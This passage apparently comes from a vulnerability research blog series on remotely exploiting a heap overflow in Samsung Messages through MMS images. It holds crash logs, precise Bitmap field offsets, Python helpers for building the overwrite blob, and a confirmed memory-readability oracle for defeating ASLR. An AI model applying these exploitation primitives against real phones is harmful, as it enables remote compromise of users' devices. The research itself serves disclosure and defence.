    pc  cccccccccccccccc

backtrace:
      #00 pc cccccccccccccccc  <unknown>
      #01 pc 0000000000437efc  /system/lib64/libhwui.so (android::Bitmap::~Bitmap()+252) (BuildId: fcab350692b134df9e8756643e9b06a0)
[...]

As the crash report shows, we control the instruction pointer (PC) and two 64-bit arguments (registers X0 and X1).

In summary, we have two powerful primitives for hijacking the control flow at our disposal – an indirect one through a corrupted vtable pointer, and a direct one through the freeFunc function pointer (with knowledge of the libhwui.so location). This brings us much closer to the ultimate goal of executing arbitrary code. The biggest unsolved problem is now ASLR – since the locations of all important memory regions (stack, heap, shared objects) are randomized, we are completely in the dark as to where we could redirect any kind of pointer. It is time to see if the android::Bitmap object has anything to offer in terms of leaking address space information or otherwise defeating ASLR.

Building an ASLR oracle primitive

In most publicly documented exploitation scenarios, ASLR is bypassed in a highly interactive environment, where the communication between the exploit and the attacked software goes both ways. Examples include JavaScript exploits vs. web browser engines, user-mode exploits vs. OS kernels, and remote exploits vs. network daemons. In all these cases, the leaked address of some object in memory is typically received by the exploit in full, and the "ASLR bypass" problem boils down to enticing the target to transmit the address to the client as part of a standard data exchange.

The circumstances are largely different for exploits delivered via MMS. Here, all communications are realized through one or more mobile network operators, and it is (mostly) a one-way protocol. As a result, a remote attacker gets very little visibility into what happens on the victim's phone, let alone being able to disclose some complex information such as a 64-bit address in one go. Notably, the same problem was already encountered by Samuel Groß when exploiting the iMessage vulnerability CVE-2019-8641 on the iPhone in 2019. In his research, Samuel managed to work around it by making use of message delivery receipts. Depending on how they are implemented, they may be abused to construct a rudimentary 1-bit communication channel going back to the attacker, potentially carrying some kind of address-related information. In the case of iMessage, it conveyed the output of an ASLR oracle, indicating if a given absolute address was mapped in memory and had some specific properties. I highly recommend reading the relevant "Remote iPhone Exploitation Part 2: Bringing Light into the Darkness – a Remote ASLR Bypass" post on the Project Zero blog.

The mechanics of the MMS protocol will be discussed in detail in the next post, but for the sake of the storyline I will reveal that MMS also supports delivery receipts. What's more, some SMS/MMS apps such as Samsung Messages do allow the disclosure of information on whether or not the process crashed while processing the incoming message. In turn, this opens up the opportunity to leak partial information about the address space, if we can tie the crash/no crash outcome to the process memory layout. That's where the corrupted Bitmap object comes into play again.

The most basic idea for how to achieve that is by overwriting a pointer with an absolute address whose readability (or writability) we intend to test. In theory, if the address is unmapped, the access will crash, and if it is mapped, the read or write will succeed and the app will stay alive. In practice, things are not so simple, because the process may also crash while operating on the data read from the tested address. So for example, the vtable pointer is not a great candidate for an ASLR oracle, because keeping the process alive would not only require it to point to a readable region, but it would also need to contain the address of a function semi-compatible with the original destructor. Such an oracle would realistically hardly ever return true, which makes it of little use to us.

Luckily, the Bitmap object also contains a few other pointers we can try to target. To start off, we can overwrite its whole area with all 0x41's and see how the process crashes, to determine which pointers are accessed, where, and how. The experiment should yield the following result:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x41414141414189 in tid 11604 (pool-5-thread-1), pid 10524 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 000000000047a760  /system/lib64/libhwui.so (SkColorSpace::toXYZD50(skcms_Matrix3x3*) const+8)
      #01 pc 000000000018df90  /system/lib64/libandroid_runtime.so (GraphicsJNI::getColorSpace(_JNIEnv*, SkColorSpace*, SkColorType)+280)
      #02 pc 00000000002b5788  /system/framework/arm64/boot-framework.oat (art_jni_trampoline+152)
      #03 pc 00000000005818bc  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.getColorSpace+76)
      #04 pc 000000000057faf0  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createBitmap+880)
      #05 pc 00000000005804f4  /system/framework/arm64/boot-framework.oat (android.graphics.Bitmap.createScaledBitmap+372)

The stack trace indicates that the crash occurs while accessing the color space, which is represented by the mInfo.fColorSpace pointer. It might be promising for an oracle, but let's see what happens if it's set to an address of readable memory containing only zeros:

Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 12666 (pool-5-thread-1), pid 12550 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]
pid: 12550, tid: 12666, name: pool-5-thread-1  >>> com.samsung.android.messaging <<<
uid: 10128
signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
Abort message: 'No pending exception expected: java.lang.IllegalArgumentException: Parameter a or g is zero, the transfer function is constant
  at void android.graphics.ColorSpace$Rgb$TransferParameters.<init>(double, double, double, double, double, double, double) (ColorSpace.java:2264)
  at android.graphics.ColorSpace android.graphics.Bitmap.nativeComputeColorSpace(long) (Bitmap.java:-2)
  at android.graphics.ColorSpace android.graphics.Bitmap.getColorSpace() (Bitmap.java:2091)

Unfortunately, the app crashes again, this time due to a failed color space sanity check performed by the TransferParameters constructor. This means that this pointer is not the perfect gadget for us either, because zeros in memory are exceedingly common, and it would be preferable to distinguish unmapped memory from mapped zeroed memory in the ASLR oracle output.

The advantage of the last crash report is that it gives us a very clean Java call stack, indicating exactly where the bitmap-related operations occur. It is shown below in full, up until the Messages app method that loads the bitmap delivered in MMS:

android.graphics.ColorSpace$Rgb$TransferParameters.<init>
android.graphics.Bitmap.nativeComputeColorSpace
android.graphics.Bitmap.getColorSpace
android.graphics.Bitmap.createBitmap
android.graphics.Bitmap.createScaledBitmap
com.samsung.android.messaging.common.util.ImageUtil.scaleToHeight
com.samsung.android.messaging.common.util.ImageUtil.scaleToWidth
com.samsung.android.messaging.common.util.ImageUtil.loadBitmapFromStream
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.common.util.ImageUtil.loadBitmap
com.samsung.android.messaging.ui.model.l.at.a
[...]

We can see that Samsung has a helper ImageUtil class for working with bitmaps, and that unfortunately some symbols in the app are obfuscated (i.e. the ui.model.l.at.a method name). Since the Messages app is not open source, we have to decompile it in order to examine the relevant code. The APK can be found in the /system/priv-app/SamsungMessages_11/SamsungMessages_11.apk file, and my decompiler of choice is jadx.

Lifetime of a Bitmap

When we dig into the Java code, it becomes evident that the lifetime of the Bitmap object is somewhat complex, and it may be subjected to a few transformations. Let's take it step by step:

  1. The initial Bitmap is created through a BitmapFactory.decodeStream call in ImageUtil.loadBitmapFromStream:

    Initial BitmapFactory.decodeStream call

  2. The bitmap is then subjected to scaling:

    Scaling the bitmap to width

     The scaling is in fact optional, and only happens if the bitmap dimensions are greater than the intended ones:

    Decompiled scaleToWidth function

  3. Lastly, in the com.samsung.android.messaging.ui.model.l.at.a method, if the bitmap configuration is not ARGB_8888, it is converted to such encoding:

    Loading and converting the bitmap in Samsung Messages code

In a nutshell, step 1 is where the bitmap is allocated, decoded, and overflown, and steps 2 and 3 are where the corrupted object is used, and where we should look for the desired ASLR oracle primitive.

I spent quite some time looking at the image-related Skia code and experimenting with various values of the Bitmap fields. Eventually, I discovered a perfect technique for probing arbitrary addresses to check if they are readable. The primitive is located in step 3 (bitmap conversion to ARGB_8888), so the first order of business is to disable the scaling in step 2. Assuming that we're starting off with a blob of 160 bytes of 0x41 again, we should adjust:

  • fWidth (offset 0x0c) → 0x1
  • fHeight (offset 0x10) → 0x1

While we're at it, it will make our life easier later if we make the second set of dimensions sane too:

  • mInfo.fWidth (offset 0x60) → 0x1
  • mInfo.fHeight (offset 0x64) → 0x1

Then, we need to make sure that we pass the two rowBytes checks in SkBitmap::setInfo by setting the field to a sensible value:

  • fRowBytes (offset 0x20) → 0x1000

If mInfo.fColorSpace is non-NULL, it will be dereferenced, so we have to zero it out:

  • mInfo.fColorSpace (offset 0x58) → 0x0

This gets us past the copying/sanity checking of the basic properties of the bitmap, and into the pixel copying logic under android.graphics.Bitmap.copy → Bitmap_copy → bitmapCopyTo → SkPixmap::readPixels → SkConvertPixels → swizzle_or_premul. To be able to use the swizzle_or_premul conversion routine, the color type needs to be either RGBA_8888 (4) or BGRA_8888 (6), and since it cannot be the former due to the Bitmap.Config check in Java code, there is only one option left:

  • mInfo.fColorType (offset 0x68) → 0x6
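
The field overrides collected so far can be gathered into a small script that builds the overwrite blob. This is only a minimal sketch, not the tooling used in the research: the offsets and values come from the lists above, while the field widths (32-bit for dimensions and color type, 64-bit for the pointer and fRowBytes), the little-endian encoding, and the build_bitmap_blob helper name are assumptions made for illustration.

```python
import struct

BLOB_SIZE = 160  # size of the overwritten area, filled with 0x41 by default

# (offset, struct format, value); offsets and values are taken from the text.
# Field widths are an assumption: "<I" = 32-bit, "<Q" = 64-bit, little-endian.
BASE_FIELDS = [
    (0x0C, "<I", 0x1),     # fWidth
    (0x10, "<I", 0x1),     # fHeight
    (0x20, "<Q", 0x1000),  # fRowBytes
    (0x58, "<Q", 0x0),     # mInfo.fColorSpace (NULL, so it is not dereferenced)
    (0x60, "<I", 0x1),     # mInfo.fWidth
    (0x64, "<I", 0x1),     # mInfo.fHeight
    (0x68, "<I", 0x6),     # mInfo.fColorType = BGRA_8888
]


def build_bitmap_blob(fields=BASE_FIELDS, size=BLOB_SIZE):
    """Return a blob of 0x41 bytes with the given fields patched in.

    Hypothetical helper: it only models the layout described in the text.
    """
    blob = bytearray(b"\x41" * size)
    for offset, fmt, value in fields:
        struct.pack_into(fmt, blob, offset, value)
    return bytes(blob)


blob = build_bitmap_blob()
```

Keeping the overrides in a table makes it easy to append further fields later without touching the packing logic; every byte not listed stays at 0x41.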

Finally, we arrive at the following loop:

    for (int y = 0; y < dstInfo.height(); y++) {
        SkOpts::RGBA_to_BGRA((uint32_t*)dstPixels, (const uint32_t*)srcPixels, dstInfo.width());
        dstPixels = SkTAddOffset<void>(dstPixels, dstRB);
        srcPixels = SkTAddOffset<const void>(srcPixels, srcRB);
    }

That's where the BGRA to RGBA conversion takes place. In the above snippet, the values of most variables originate from the overwritten android::Bitmap object:

  • dstInfo.height() == mInfo.fHeight
  • dstInfo.width() == mInfo.fWidth
  • srcPixels == fPixels
  • srcRB == fRowBytes

So in other words, for each row of the bitmap, the code copies width×4 bytes from a controlled pointer, and moves the pointer by fRowBytes. This is also illustrated below:

This conversion logic gives us enormous flexibility in terms of the addresses we can trigger accesses to, and importantly, the data being read is just pixel colors, which are completely neutral to the control flow of the code. In the most basic scenario, we can leave the current state of the corrupted fields and make just two more changes:

  • fPixels (offset 0x18) → start of the probed address range
  • mInfo.fHeight (offset 0x64) → number of pages to probe

This will cause Skia to read four bytes in 0x1000 byte intervals, for mInfo.fHeight iterations, starting from the fPixels address. It is equivalent to probing the readability of an arbitrary contiguous memory area – if all pages are mapped and readable, the loop will complete successfully and the app will stay alive; otherwise, it will crash while trying to access the first non-readable page in the tested range.
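
To make the access pattern concrete, the source side of the loop can be modeled in a few lines. This is a rough sketch of the behavior described above, not Skia code: the probed_ranges name is hypothetical, and the start address used in the example is an arbitrary placeholder.

```python
def probed_ranges(f_pixels, height, width=1, row_bytes=0x1000):
    """Yield the (start, end) byte range read in each iteration of the loop.

    Parameters mirror the corrupted fields: f_pixels is fPixels, height is
    mInfo.fHeight, width is mInfo.fWidth and row_bytes is fRowBytes.
    """
    src = f_pixels
    for _ in range(height):
        yield (src, src + width * 4)  # width pixels, 4 bytes each
        src += row_bytes              # srcPixels advances by fRowBytes


# Placeholder start address; three rows means three consecutive pages probed.
ranges = list(probed_ranges(0x7000000000, height=3))
for start, end in ranges:
    print(f"read {end - start} bytes at {start:#x}")
```

With a width of 1 and a row stride of 0x1000, each iteration touches exactly one page, which is what turns the pixel conversion into a page-granular readability probe.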

As always, we should confirm the behavior on a real device. We can start off with setting fPixels to an invalid address such as 0xccc...ccc, and sending the sample via MMS:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xcccccccccccccccc in tid 1101 (pool-8-thread-1), pid 848 (droid.messaging)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
[...]

backtrace:
      #00 pc 00000000006fb210  /system/lib64/libhwui.so (neon::RGBA_to_BGRA(unsigned int*, unsigned int const*, int)+96)
      #01 pc 00000000003b5410  /system/lib64/libhwui.so (_ZL17swizzle_or_premulRK11SkImageInfoPvmS1_PKvmRK22SkColorSpaceXformSteps.llvm.9990621564539140211+208)
      #02 pc 00000000003b5114  /system/lib64/libhwui.so (SkConvertPixels(SkImageInfo const&, void*, unsigned long, SkImageInfo const&, void const*, unsigned long)+156)
      #03 pc 00000000004f26c0  /system/lib64/libhwui.so (SkPixmap::readPixels(SkImageInfo const&, void*, unsigned long, int, int) const+312)
      #04 pc 0000000000185fb8  /system/lib64/libandroid_runtime.so (bitmapCopyTo(SkBitmap*, SkColorType, SkBitmap const&, SkBitmap::Allocator*)+384)
      #05 pc 000000000018397c  /system/lib64/libandroid_runtime.so (Bitmap_copy(_JNIEnv*, _jobject*, long, int, unsigned char)+284)
[...]

A SIGSEGV is indeed generated upon a read from the bad address in the color conversion function. Let's try something more complex. On my test device, the last mapping in the address space of the com.samsung.android.messaging process is a stack:

7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]

To verify that our oracle primitive touches each page in the given area, we can set fPixels to 0x7fdfb10000 (eight pages before the end of the stack), and mInfo.fHeight to 10. As a result, we should see the following crash:

Fatal signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x7fdfb18000 in tid 1630 (pool-8-thread-1), pid 1500 (droid.messaging)

The fault address lies directly after the stack mapping, which indicates that the loop successfully executed eight iterations, and failed during the ninth, when it went out of bounds. This completes our quest for a suitable ASLR oracle primitive, as it ultimately shows that we can now remotely trigger memory reads of a highly-controllable set of addresses in the context of the attacked Messages app.
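
The expected fault address can be double-checked offline with a small simulation. The sketch below is an illustrative model only: it treats every mapped address as readable (permissions are ignored), and the parse_maps_line and first_fault names are hypothetical helpers rather than part of any real tool.

```python
def parse_maps_line(line):
    """Extract the (start, end) address range from a /proc/<pid>/maps line."""
    start, end = line.split()[0].split("-")
    return int(start, 16), int(end, 16)


def first_fault(f_pixels, height, mappings, width=1, row_bytes=0x1000):
    """Return the first unmapped address the loop would read, or None.

    Simplification: any address inside a mapping counts as readable.
    """
    src = f_pixels
    for _ in range(height):
        for addr in range(src, src + width * 4):
            if not any(start <= addr < end for start, end in mappings):
                return addr
        src += row_bytes
    return None


stack = parse_maps_line(
    "7fdf319000-7fdfb18000 rw-p 00000000 00:00 0                              [stack]"
)
fault = first_fault(0x7fdfb10000, 10, [stack])
print(hex(fault))  # 0x7fdfb18000
```

In this model, lowering the height to 8 keeps all reads inside the stack mapping, so first_fault returns None, which corresponds to the "no crash" outcome of the oracle.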

Summary

To recap, we have analyzed the available memory corruption bugs based on pseudo-ASAN crash reports, and decided to work with a linear heap overflow present in RLE decompression. The overflown buffer is a pixel storage allocation associated with an android::Bitmap object, and thanks to some useful jemalloc properties (determinism, size bins, lack of inline metadata), we found a way to reliably corrupt the relevant Bitmap object itself.

The Bitmap class is non-trivial, and it provides a variety of useful primitives when corrupted. In order to hijack the control flow, we can provoke a call from an arbitrary vtable pointer, or cause a direct call to a controlled function pointer with two arguments, if we know the address of libhwui.so. Furthermore, in the context of a potential ASLR bypass, we can prompt accesses from a controlled memory range, which may trigger a crash or not depending on the readability of the region. This is as good as we're going to get with regard to low-level exploitation capabilities.

With solid foundations laid down for the attack, we can shift our attention to some important higher level issues, such as:

  • How to programmatically send MMS messages?
  • How to (ab)use the MMS protocol to leak information on whether the Messages app crashed upon the receipt of a message?
  • Even with the presence of a potential side channel, how to disclose the full addresses of data and/or code in an effective and timely manner?
  • Finally, how to convert the currently known RCE primitives to achieve actual arbitrary code execution?

Finding the answers to these questions will be the subject of the upcoming blog posts in the series.
